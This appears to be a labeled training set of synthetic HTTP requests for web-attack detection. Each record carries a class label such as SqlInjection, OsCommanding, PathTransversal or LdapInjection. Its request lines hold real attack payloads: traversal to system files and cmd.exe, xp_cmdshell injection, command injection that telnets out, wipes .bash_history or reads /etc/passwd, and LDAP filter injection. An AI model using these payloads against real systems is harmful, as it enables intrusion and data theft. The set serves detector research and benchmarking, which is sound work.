User-Agent: tnpBecp/5.8.0.8.8
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0695x2392
Via: FTP/5.0 www.og9nrsr.gif
Transfer-Encoding: deflate
Upgrade: titdOa/5.1
Warning: 873 179.220.247.176 "a53nepbizi" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 24027765895
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49384
Start - Id: 45942
class: PathTransversal
GET /t1zLV2_/jo1Su9s7Vj0owRy/9MCknodeU/im6qthneLsp/zPmldxb/nETshrP5gae/UnoOFdSGlink.png?hoka3r=pouemeg+&ecihieeOoulnIt=%5CWINNT%5Csystem.ini&ryfYcmkS=e%5Deefhacwtein&enrphu=nioed%3De%3Dl%24having8E&ELexecZL=25265 HTTP/1.1
Host: www.uaronra.ch
Connection: lgnnb
Accept: text/xml;q=0.7
Accept-Charset: iso-8859-1
Accept-Encoding: *;q=0.7
Accept-Language: 24sm-sxacne;q=0.8
Cache-Control: max-age=07355
Client-ip: 81.34.102.44
Cookie: 2wHbody3UFd='doewyaoperl +T;renqlnhbAi=33169;tpeteeix8a=h8NaneareeadOe
Cookie2: $Version="0"
Date: Thu, 05 Feb 04 05:56:41 CET
ETag: "HSlLUZs3qF9UWKYK"
Expect: eT6euen=9eaNn9nm;meo5si=0tshnnor
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Wed, 08 Feb 06 02:38:56 UTC
If-Unmodified-Since: Sat, 08 Jul 06 21:39:45 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Sep 04 05:31:28 UTC
Max-Forwards: 2
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: /ndnu7.bin
TE: trailers,chunked,trailers
Trailer: Accept
User-Agent: Mozilla/0.7 (Windows; U; WinNT 1.2; 5a-bn; rv:6.4.6) Gecko/88453510
UA-Disp: 3135,8994,8
UA-OS: Mac OS X
Via: 0.1 www.ia1rliel.png
Transfer-Encoding: telre
Upgrade: Hne/9.3, keht/9.7, eldt/7.3, tlenn/6.0
Warning: 786 71.178.133.86 "gcytuoa0fu2vnqnsqu" "Fri, 19 May 06 24:14:20 CET"
X-Forwarded-For: 226.91.8.34
X-Serial-Number: 15666151508879935432
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45942
Start - Id: 35044
class: SqlInjection
GET /2ry6tnaio9slojtt/J5n_UZwi2/naoeogrnetu/uBbBavg.9T4yUxbe/PUz/It.jpeg?SwMmtEcr=%5D%27ebs&outwp=ss+%29&wrp1OtRib=XeeMrn&91c9gW=lrR&stpouOeazieFr=eyate&dpanetlenosroC=1024616&Abtt=u+m&wo=eeoptare2oawe0T%40oaue8I&TmochaexecH=e_On19i&vJBwPHOz=pdA3ria%7E&ritghni1id7h=tFkNtKC43do&upcRj0af=%25&NADGVconnecth=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe HTTP/1.1
Host: 88.70.111.243
Connection: close
Accept: audio/*;q=0.6, image/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 175.67.198.190
Cookie: Zbrbi=rtheeo\eimz;cwiemlinose=otheeT;ypyDniae2Oitk=bmoseibtixtermr;zsnkedqSmeju=eQWV6.Hef
Date: Tue, 21 Jun 05 09:01:10 CET
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Sun, 13 Sep 09 06:34:07 UTC
If-Unmodified-Since: Wed, 05 Jan 05 16:51:01 CET
If-Match: "@E7Ef4CY-tUdMPWb1R5"
If-None-Match: "GKtrY63.V_2TGqIQgc5"
If-Range: *
Max-Forwards: 9872
MIME-Version: 0.3
Pragma: th=lhhn
Proxy-Authorization: Basic dDlhaW46dXFjcA==
Authorization: nMsev rhec=oooQeenc
Range: -373777
Referer: http://www.Story9lk.de/inxo/dsltoeb1/Taxei/mnrS/roibl5.nsf
TE: trailers
User-Agent: Mozilla/4.6 (X11; U; SunOS sun4u 9.5; 0a-ug; rv:7.8.7) Gecko/37351310
UA-CPU: StrongARM
UA-Color: color32
Via: FTP/1.4 114.160.20.122, 6.5 149.29.32.120, wayos/7.9 www.edTiEew.jpeg
Transfer-Encoding: compress
Upgrade: ntza0i/5.5
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35044
Start - Id: 41062
class: SqlInjection
GET /ucp/e_WcjtMeyOVpq_Tr/IFT6447y7uvgNmI/sTxg2wirkeCVGB.shtml?rz9ttoee=yidbiretti&ny9amcemoaei=3268355&ipinxea9ibl=tcTu+tre%26&cef=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe HTTP/1.1
Host: www.ir0uev.org
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-arabic;q=0.0, shift_jis, euc-tw, iso-2022-kr;q=0.2
Accept-Encoding: *
Accept-Language: cr2ao-tkesngt;q=0.6
Cache-Control: only-if-cached
Client-ip: 29.8.160.212
Cookie: enkaRuuaukaa=3279792;Lsnna2oo351su=hff$;bEor3ierolds=emag]ssew;eIiczhe9=gidereecxta0e7sl;oeewzeflgzcasc=passwd5e9ejEi0Ocftpn;2ectur=tvCf7lToHux
Cookie2: $Version="070"
Date: Sun, 02 May 04 12:18:00 UTC
ETag: W/"ga2kKXwj1Y@JXowfNrY"
Expect: ttrhbztf
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Sun, 01 Feb 04 07:09:02 CET
If-Unmodified-Since: Fri, 04 Apr 08 19:38:00 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 21 Feb 05 05:10:47 CET
Max-Forwards: 878
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic aWlyZWl0NzpkaGRpRW1z
Range: 7-04,570-
Referer: /otwx/SgUE/tEzsrs.shtml
TE: trailers,deflate
Trailer: Max-Forwards
User-Agent: hnhe15ou (tGKFBF)
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x915
Via: FTP/6.2 www.4eehn.js:05626, 4.6 94.209.235.135, 7.8 www.gdfi.htm
Transfer-Encoding: identity
Upgrade: uohtr/6.5, oeo/0.4
Warning: 877 www.heeSgt.js "eesoiba6hadr9x5" "Fri, 08 Dec 06 08:31:01 UTC"
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41062
Start - Id: 43597
class: OsCommanding
GET /ro3y6tnofrc9a2krq/tjkh1Dafgxx49az@E6MM/tne/pk/jUY/ehoicatt/cDlJdiv5jqpk9j5vt/enegdyeednih1fwe/ooWv761.aK3weV/T8i/ihkdTe8xTPCi.gif?thmtnbrPGeanl=ro&welieAweoA=sntn9o&Qqtss=hbn0m%24riabzot0&DtGCprocessing-instructionSLbnph-=3&ah8gitij9aif=59352&iScDhej4hol=3&rahitat=9903671049&ucug=506634&oicoecss=750933&un=n%3Bcerehsandwindow.open+d19positionoLd&estlrvmratlt=%5C%22++++%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++www.ritaatdeto.com+++189+++%3B&usrnImH=h0jor0erf HTTP/1.0
Host: 114.2.85.175:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: euc-cn;q=0.0, x-mac-arabic
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 229.233.28.110
Cookie: K1Sh5mochaA6i0dh=781083592;rwVesgmntmti=lt6;iertjb=xmlf@tse>;VshutdownrNzV=upmd
Cookie2: $Version="7"
Date: Sun, 05 Jun 05 06:43:25 CET
ETag: "GBRfJtdKze1.lU3kgC"
Expect: gtmnl0e=x4oheja
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Mon, 22 May 06 14:29:25 CET
If-Unmodified-Since: Wed, 12 Apr 06 20:17:31 CET
If-Match: "C9549bAcedP-wSE"
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: *
Max-Forwards: 3
MIME-Version: 5.4
Pragma: a9tSer=hglmds
Proxy-Authorization: Basic ZmxqY3lhaXA6dHNyZXdl
Authorization: sqem rptnhae=gV0onh3a
Range: -49,-4,23-3
Referer: /1iu53Pe/oekcoa.gz
TE: gzip,chunked;q=0.4,chunked;q=0.8
Trailer: Range
User-Agent: Mozilla/7.4 (compatible; eaa7eyomj; Win 9x; twticn; essm; dege)
UA-CPU: PowerPC
UA-Disp: 084,5683,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 604x8561
Via: 7.4 156.104.50.213, HTTP/3.8 73.97.5.179, FTP/2.3 www.eelhgss.js
Transfer-Encoding: gzip
Upgrade: wyme/7.1
Warning: 888 www.nazwap.css "n5ewrsqhebhsof" "Mon, 16 Jun 08 15:04:37 CET"
X-Forwarded-For: 25.170.198.152
X-Serial-Number: 597498125488079
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 43597
Start - Id: 36488
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 187.30.246.62
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: wiQasMeo-pee;q=0.2, zremj-mn;q=0.5, s-qrrh, dk1h-m6ayfs
Cache-Control: ncaJ='e'
Client-ip: 219.137.139.146
Cookie: fttn4ar7aam=smt+>;o1nploqineho=11;e8aserfzOhtcaei=t l1eilikeqoixwe;namhe=00;hsoeorvnkeaEndo=gway9ru;KSrLGO=q
Cookie2: $Version="984"
Date: Fri, 06 Feb 04 06:40:10 UTC
ETag: "EEjfH1qoZefe@m2kmR"
Expect: sesutAnn
From: n8us@72HjX.ch
If-Modified-Since: Thu, 15 Feb 07 05:51:15 UTC
If-Unmodified-Since: Wed, 26 Jul 06 01:18:34 GMT
If-Match: "8NqOGhZtd.10osrYsCUi"
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Thu, 17 Aug 06 17:47:41 UTC
Max-Forwards: 615
MIME-Version: 9.8
Pragma: k='Yat'
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: NTLM YXZ2NmcxYTE0aHJodG9vZWxlcGFoamk2aG5kYU9uaXVjZUdhM3dVaG5ucml5Yw==
Range: 998505-,-0540,815-
Referer: /ttuv/nio9/dRl075/S4fNr/oti2.sh
TE: trailers
Trailer: If-Modified-Since
User-Agent: rc-M9-Vs http://www.eire3EDc.fr
UA-CPU: 68000
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 512x1298
Via: FTP/1.6 www.eeahm8my.htm
Transfer-Encoding: oeEjm
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36488
Start - Id: 43929
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 62.89.127.153
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: rrrvnwwu-ieti, ay-il4a1;q=0.6, oasert-rwa;q=0.6
Cache-Control: min-fresh=465
Client-ip: 22.30.133.135
Cookie: dbejloh=ud.;bxihl=aFmlPB
Cookie2: $Version="95"
Date: Wed, 25 Mar 09 09:01:40 GMT
ETag: W/"TWTCwcFzGF4CUXyjo"
Expect: Hqscnnpi
From: ri9h6cs@tZrtxhhdgg.be
If-Modified-Since: Tue, 03 Nov 09 17:02:38 CET
If-Unmodified-Since: Mon, 12 Apr 10 12:24:17 GMT
If-Match: "Hpz7QkwsSHPIH8@F"
If-None-Match: "ysMR.zfJLfC@VBlM"
If-Range: Fri, 11 Jun 04 01:57:49 GMT
Max-Forwards: 2238
MIME-Version: 3.4
Pragma: enlta8='a8fi2M'
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: Digest realm
Range: 0334-,997362-098401
Referer: /Ehtnao/rmie.nsf
TE: gzip
Trailer: If-None-Match
User-Agent: 0eatKuqs
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 5.6 109.99.27.18:8021, zsyj0/5.6 248.177.75.134, FTP/4.4 www.bcENe.jpeg
Transfer-Encoding: deflate
Upgrade: ogt/9.9, 4yhxao/5.1, ata/5.6, irI/7.1, a7Nh/9.7
Warning: 590 204.118.91.69 "eitd3dnkcep3Sina3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43929
Start - Id: 45054
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: www.Hctfit.com
Connection: keep-alive
Accept: image/png;q=0.8, audio/*;q=0.4, text/xml
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: Acv7egoE-lEti, hnsjd-leEao;q=0.8, t6on-aeotQrw, wld-lhoS
Cache-Control: min-fresh=2852
Client-ip: 69.142.236.19
Cookie: hnsii=eiassWhlNkdt;Tmei=87
Cookie2: $Version="8"
Date: Tue, 15 Nov 05 24:55:41 UTC
ETag: W/"WKqnGI4_ReyBsPB"
Expect: i6ael
From: Otai@40ezesm.uk
If-Modified-Since: Wed, 13 Oct 04 05:52:18 UTC
If-Unmodified-Since: Thu, 27 May 04 23:47:01 GMT
If-Match: "TTIhTkQNf7186Jkfbi1u"
If-None-Match: "GoqdBXduDrkbwhfn6"
If-Range: "LpRSoyCyuGveBS7fJvx-"
Max-Forwards: 67
Pragma: no-cache
Authorization: xiMii qscosvqi=EerhiA
Range: -6543,-6,-30
Referer: http://vese.org/t4myee.sh
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: tgrco9i (g7CpIyB-)
UA-CPU: MIPS
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Pixels: 127x929
Via: 5.5 45.174.223.15, 6.7 235.194.161.181, 2.1 5.32.67.186
Transfer-Encoding: gzip
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 905 80.144.212.89 "cvcWhwiseqlaaOni" "Wed, 28 Jan 09 19:24:15 UTC"
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 23020199164875
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45054
Start - Id: 44855
class: PathTransversal
GET /auhlid6dzosltRnsP/oIl/aw/7W3r-RqHZkk@s2VrS/se4a.shtml?qEapewze4=6EUiF0NGdC&cel6=nxin+&e44atdidfnarN=e6V&eHn0s3dfot6=heneh&zbMestgaE=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&bdS0ttd=67&e1hdEaOwum4c=1bnaiw5haron2s&deote=13&fr6nnseps=laesamoUTlita30cen HTTP/1.0
Host: www.tfoNe.cz:46
Connection: close
Accept: audio/*
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: mNhh-adeoa2b;q=0.9
Cache-Control: min-fresh=45
Client-ip: 99.178.36.179
Cookie: 5jTEmt@-KyKinput=8ehe97
Cookie2: $Version="89"
Date: Sat, 14 May 05 16:54:39 CET
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: eloob=qdejeads
From: netotmi@oanhTettwr.cz
If-Modified-Since: Tue, 04 Apr 06 05:37:57 UTC
If-Unmodified-Since: Mon, 11 Feb 08 18:20:34 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 28 Nov 08 03:28:06 GMT
Max-Forwards: 1
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic dWRlNmk6eG1ocHA4Zjk=
Authorization: grc8oR eiegtimg=espmsrio
Range: 3752-,303-8,-33345
Referer: /tUeaf/eaoyee74/eLdcphlM.swf
TE: trailers,trailers,gzip;q=0.8
Trailer: Date
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 1.6; j2-aa; rv:7.2.1) Gecko/91133843
UA-CPU: StrongARM
UA-Disp: 5979,4863,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 458x842
Via: 7.9 www.uwoqrttt.htm, HTTP/7.8 113.147.68.116
Transfer-Encoding: gzip
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 565 www.9hmbio.js "egRIp9dtnpPtahcsat" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 65016581
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44855
Start - Id: 38720
class: LdapInjection
GET /rO/u6SHt3RphpQp/5k@0VFguJh7QoQ_/s5jd78tevekSniza8f/3kUClh_ftaz5.b/amLyhtaccesXZTG8ThN/aJ0N/8na0TcaaO.sh?jeo4dtnnahtc2ea=iEsJjIn&nn=%2BhitY%25ej&IEegeotmhe=9uulaua1s&snsTnhsxzMtcav=fpOgevalehc&n0onl9insaosX=pXn269a6IC1&jttbftliowmzoal=rh%3Al&WiFandPraYNFYform=7nsTaGoak&fnsenpaHhlRm=t5g&v3ssa8=78504684&QadminbcxKJNVJ=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&nRWdyprms=6152875&9vnJzDM=mBfpl&d7tuu=%2Beansie&ecaS0=%7E%40includeo&bg0aevals-S=nhikn9e HTTP/1.1
Host: 222.159.167.172
Connection: close
Accept: image/jpeg
Accept-Charset: utf-7, cp-932
Accept-Encoding: 
Accept-Language: tRqg-7mulet, irc-noenYz;q=0.5, aO-Ejar4;q=0.7
Cache-Control: no-store
Client-ip: 95.161.31.177
Cookie: tsgrTs7nqlles=Rmlwboaoo87ts7eAtpasswd;eyko3N6sf=htys;z0tltht5=6701;aonaepoa=57tbntatld
Cookie2: $Version="8"
Date: Sat, 05 Sep 09 01:10:20 GMT
ETag: "PaeiWKQYQ3SKMBAkLp"
Expect: 100-continue
From: ilrb@h5ihiwr.cz
If-Modified-Since: Sun, 29 Nov 09 20:14:50 GMT
If-Unmodified-Since: Wed, 24 Mar 10 12:48:46 CET
If-Match: "hBO3-EiL@.CCvD1PA@HY"
If-None-Match: "cJno@Uj23fjxIs1"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.7
Pragma: 8teer3pr='nhI'
Proxy-Authorization: Digest algorithm=pssp
Authorization: Basic ZHlpZXQ6dHQ3YW53YQ==
Range: 5873-
Referer: /an1Cyc/hbJf2t5d/efee3m.jpg
TE: trailers
Trailer: If-Range
User-Agent: mZNQbXUQy4 http://www.ketwTo.org
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: HTTP/4.4 www.nezexm.shtml:07099
Transfer-Encoding: gzip
Upgrade: uau3/2.9
Warning: 792 57.164.145.223:2 "o6u6iwaenei" "Thu, 08 Oct 09 12:11:05 UTC"
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 0697506678006
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38720
Start - Id: 43516
class: OsCommanding
GET /Gd/Ttwfae837ehheguiceoe/edixan/kUjSsbl0TbybXWRrx@i/n2_pioMnSW9/7Op/aQi4dd1lrolnbbioZa/anl5F0ei4tgoc/RgUsO6umamconnect.u@4/uIfdmeponllgsne9nen/riahhi6so/hwGFtG@5@n_C.jpeg?xrer=itW%3D3terS&KXQYl=Ies&8LFM4zRs=%27+++++%3B++rm+%7E%2F.bash_history++%3B&staite1fennhreb=n%7CqeElwget&po8mahoFoia=r_77dhFAZz%40&hsmhel0mna=cqPMKYKaxQt_&onr=2422&sudbtqae=bqnZwy&imf=7abtOAehnlaNni HTTP/1.0
Host: www.oRyef.uk
Connection: close
Accept: */*;q=0.3
Accept-Charset: windows-1251;q=0.5, x-mac-turkish, iso-8859-8;q=0.4, macintosh;q=0.3
Accept-Encoding: 
Accept-Language: i-e;q=0.0
Cache-Control: min-fresh=137
Client-ip: 108.184.195.217
Cookie: O2Kbodylwinnt-J5SA=2affa;l1ano=781;rn9undree0=0970613;Es=urmxstIecxNew;esret9=he=/;6a=nhn
Cookie2: $Version="613"
Date: Fri, 23 Feb 07 11:54:29 CET
ETag: "PxnNJB_jtB5FqDUJ"
Expect: 100-continue
From: tfmhsdrp@fM13.gov
If-Modified-Since: Thu, 13 Nov 08 11:46:17 UTC
If-Unmodified-Since: Fri, 09 Nov 07 01:27:22 UTC
If-Match: *
If-None-Match: "cID5GLTs_skJKM_5"
If-Range: Tue, 01 Jun 04 19:50:49 UTC
Max-Forwards: 1111
MIME-Version: 5.5
Pragma: mrt=ct2to
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic bGl5ZW5ld2U6aWxvTmNkYWY=
Range: 41-,-475,4948-
Referer: http://lhHyt.fr/llESah2d.php4
TE: trailers,deflate;q=0.7
Trailer: Trailer
User-Agent: lu2AKglkq http://www.uioerjl.uk
UA-CPU: PowerPC
UA-Disp: 5670,938,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: 6.8 49.0.73.241, 2.4 www.stx5.tiff, 3.3 109.229.21.193
Transfer-Encoding: deflate
Upgrade: tlle/3.2, ouiu/2.7, 6nb/4.0, iuoaC/4.5, ioatma/4.1
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 134.201.54.76
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43516
Start - Id: 38660
class: LdapInjection
GET /7aTnmmaq/qLFFO/o8ittpZDaeuG/Ohfa0zyaiiql8utmEpe/1kgNmbrMBTuMg-x6-Ln/etx.6EGEgjXvr9/avtno5tTesdm2a/ms5tetn9shezte/qandl2imga.bin?.JuKVCI=ig4SocpeRphtbe1ad&fNjl5=755650977&eHiuteiaqpeSeh=3674917374&enenLGaaFhe=93542300&YUpMtST5H=33127&MEreplacesuM=eafeserelBnl9&eeyi=ae%29%28++%7C+%284vws%3D*%29&iR0VNUPF=1u&np1oraahs=cidutokea4nrgSsO5u HTTP/1.0
Host: www.xZna.biz
Connection: keep-alive
Accept: image/*, video/quicktime
Accept-Charset: x-mac-roman, gb2312, macintosh
Accept-Encoding: compress
Accept-Language: sgamETI6-olosfs;q=0.3, nesnIetm-hmnEuo;q=0.3, d5eg-al;q=0.7, atte-uxAbtsoe
Cache-Control: uh1teo='Rs'
Client-ip: 4.62.251.210
Cookie: 5bsectEct2r=060
Cookie2: $Version="360"
Date: Thu, 04 Mar 04 04:54:11 GMT
ETag: W/"NDTNAThFdSCA-p."
Expect: aero=c3tei1ta;Aetl
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 03 Jun 07 24:33:36 GMT
If-Unmodified-Since: Sat, 20 May 06 13:50:14 CET
If-Match: "i2_F0a4e2c5IzbPhvDg"
If-None-Match: "aQporVpJiu_M_E7c27fM"
If-Range: Thu, 28 Feb 08 14:52:46 GMT
Max-Forwards: 931
Pragma: r2lmceSu='ddr'
Authorization: fwae dceqqs=pxbnnee
Range: -3789,-5,300-00360
Referer: /xshaso.js
TE: gzip,trailers,trailers
User-Agent: Mozilla/7.1 (Machintosh; U; PPC Mac OS X 3.7; cy-na; rv:7.8.7) Gecko/71164292
Via: 1.3 136.98.143.241:3
Transfer-Encoding: gzip
----: -----------------

null

End - Id: 38660
Start - Id: 45975
class: PathTransversal
POST /St/0nLQ3cmdKfnl.php? HTTP/1.0
Content-Length: 27
Content-Language: tonii9e
Content-Encoding: deflate
Content-Location: http://www.eRhchz.biz/aaei.zip
Content-MD5: aHNpdWx6cmFvZVVtZW56YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Aug 08 22:54:00 GMT
Last-Modified: Mon, 27 Apr 09 02:28:52 UTC
Host: 22.11.15.71
Connection: azelt79o
Accept: image/*, application/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=7131
Cookie: usrYlTeMT@9where-s=36464269;hosmNrTw=332080279;aii=nandor;r6Bh0c=i%nk;i0nix8siosae1wr=tiframeyy1oee;37O24K=LUrrtyAfteemeen
Cookie2: $Version="661"
Date: Wed, 17 Dec 08 24:13:04 GMT
ETag: W/"I6Z0ysyfi9upk5OXhCH"
Expect: rrenkaih
From: ubSynrd@jJdge.it
If-Modified-Since: Tue, 03 Nov 09 08:00:55 UTC
If-Unmodified-Since: Sat, 11 Nov 06 20:10:03 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 08 May 06 23:51:59 CET
Max-Forwards: 8304
Pragma: o=im
Proxy-Authorization: Digest qop=furtk
Authorization: Basic dUpPbTo1dG4w
Range: 1614-89,75-
Referer: /lBt2.asmx
TE: trailers,trailers,gzip;q=0.8
Trailer: Authorization
User-Agent: ../../../../../../WINNT/autoexec.bat
UA-CPU: StrongARM
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 548x253
Via: 7.5 146.215.85.57
Transfer-Encoding: gzip
Upgrade: fsoe/9.8, uwtd/5.6, pcsCta/5.2
Warning: 338 134.95.42.95 "lbocbuwzwise1Nry" 
X-Forwarded-For: 87.224.179.54
X-Serial-Number: 41893725708385200236
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

erOZeitpi1ot=6054&uan=ncths

End - Id: 45975
Start - Id: 43461
class: OsCommanding
GET /tytsddogwGQs3t3hq3zo/szSHG-h/8WUlnq/es/civwiNhr3maed/q5IjCCyHXalQpzl/r7s8adEehbo/vitojmCm-5wnw2.css?eszooairr=2084901&lwasn=%7C++cat+++..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd+%7C&p9nzzivn=y19d&mxdhhbwiu8=82984626&4uiEOPlmdcyZ8=1_RkzOKC3&vmi=vR7eaa_i1Ku4&5etblS3iYn=95483753&TdeeaaAtuut=exec0&rm=tATpE.bVBm&ius27hDW=o&nor=4ie7httpsim HTTP/1.1
Host: 99.112.164.143
Connection: close
Accept: audio/basic, audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: identity, identity, compress, identity, compress;q=0.0
Accept-Language: dx-qtbu, h-ngn9;q=0.3
Cache-Control: no-transform
Client-ip: 21.205.240.147
Cookie: qic8onrtn9ntav=rFj3a
Cookie2: $Version="3"
Date: Mon, 08 Nov 04 17:11:26 GMT
ETag: "ovvj4GghfZC8siq34Gtg"
Expect: 8oyrtlas
From: t3bs@fsiaebtorf.it
If-Modified-Since: Fri, 15 May 09 13:44:44 UTC
If-Unmodified-Since: Thu, 15 Jun 06 02:31:26 GMT
If-Match: "DoLfngbAg@dIMUqZ01a"
If-Range: Sat, 25 Mar 06 11:34:09 GMT
Max-Forwards: 37
MIME-Version: 2.8
Pragma: no-cache
Authorization: tUmcn a4hk=n4Iui
Referer: /bntt/aLssltr.mspx
TE: gzip;q=0.2
User-Agent: Mozilla/3.6 (X11; U; Solaris 1.0; nc-et; rv:0.8.9) Gecko/85948138
UA-Pixels: 828x8678
Via: HTTP/5.6 38.93.68.245:063, 4.4 www.nenTz.gif
Transfer-Encoding: compress
Upgrade: oix4/9.4, hl1rd/5.1, jsHtts/4.7
Warning: 518 181.124.206.103:336 "aaIai6i" "Thu, 24 Feb 05 13:04:27 UTC"

null

End - Id: 43461
Start - Id: 37675
class: LdapInjection
POST /lzstasane/nVYqOb4/jy6rdl/rueesnw4i7del/rilhhjDtet7aeixEsoq/tGtayHCphQuE/Ialww-imgdropPW2isld.pl? HTTP/1.0
Content-Length: 285
Content-Language: iy9u5n
Content-Encoding: compress
Content-Location: http://www.Ad8arL.com/sgtss/6gNls.jpg
Content-MD5: ZW5hdHd1d2VZcHJhbW9ucQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Aug 06 01:50:29 UTC
Last-Modified: Tue, 17 Mar 09 18:49:07 UTC
Host: 95.118.91.96:80
Connection: qaureOt
Accept: application/zip
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: stdo-aasel;q=0.5
Cache-Control: a=dfycoU
Client-ip: 77.204.246.223
Cookie: tEdelsngo=2r~ygmes30group by@;tformo=A2efg
Cookie2: $Version="613"
Date: Tue, 27 Sep 05 17:21:53 UTC
ETag: "loLaNmei9ru@mP9sc@d"
Expect: eenen
From: ssDeu@yeiMt.st
If-Modified-Since: Thu, 24 Apr 08 07:53:31 GMT
If-Unmodified-Since: Tue, 04 May 04 24:29:27 GMT
If-Match: "fdP.5sI.R-AUru88"
If-None-Match: "gCmDnTP8Ts5Rlvd9-"
If-Range: Fri, 05 Mar 04 20:29:29 UTC
Max-Forwards: 0654
MIME-Version: 8.1
Pragma: ehne7='y8ixje'
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest opaque="Lrea"
Range: 6058-6,88-,-245437
Referer: http://lbj5.it/cafce/tieiE/Laaenrb/rrf3.mpg
TE: trailers
Trailer: Authorization
